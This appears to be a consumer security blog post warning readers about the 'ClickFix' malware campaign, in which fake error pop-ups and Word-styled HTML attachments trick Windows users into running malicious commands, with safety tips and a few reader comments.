WARNING: Do Not Click This Popup If You See It!
Hackers have devised a new, deceptive method to trick users into installing malware named ClickFix, according to cybersecurity firm Proofpoint.
This scheme involves enticing users with one-click fake fixes to common errors in popular programs such as Chrome, OneDrive, and Microsoft Word. Once users download and execute these “fixes” by clicking the “Copy fix” button, they unwittingly run a PowerShell or a Windows Run command that compromises their systems.
This dialogue installs a “root certificate” to flush the DNS cache, remove the clipboard content, show a fake message, and install an additional remote PowerShell script that does an anti-VM check before the information-stealer is installed. Various hacker groups, including those responsible for ClearFake, allegedly use this method. Proofpoint details how hackers exploit jeopardized sites by incorporating a malicious script handed over by Binance’s Smart Chain contract on the blockchain to spread malware and infect susceptible Windows computers.
The script will perform a series of checks to see if your computer is an acceptable candidate before downloading more payloads. It doesn’t end there since users also need to be aware of an email-based threat that uses HTML attachments with a Word look to them. These attachments will encourage users to download a “Word Online” extension to see the file.
Spreading the Infection:
Proofpoint reveals that attackers exploit compromised websites to inject malicious scripts. These scripts, delivered through Binance’s Smart Chain contract on the blockchain, specifically target Windows machines.
Beyond Pop-Ups: The Email Threat
The ClickFix campaign isn’t limited to pop-ups. Users should also be cautious of emails containing HTML attachments disguised as Word documents. These emails often urge the recipient to download a “Word Online” extension to view the attachment, potentially leading to malware infection.
Helping You to Stay Safe
Don’t Trust Pop-Up “Fixes”: If you encounter error messages within an application, find solutions from the program’s official resources or support pages.
Beware of Suspicious Emails: Don’t open attachments from unknown senders, and be wary of emails urging you to download additional software.
Use Good Security Software: Use a good antivirus/antimalware program, like Emsisoft, and keep it up-to-date.
Always be Vigilant. By being vigilant and practicing safe browsing habits, you can protect yourself from ClickFix and similar malware scams.
Thanks…D.
Thank you. Here you come to save the day!
Many Thanks for your proactive activity.
Saving us all once again.
Well done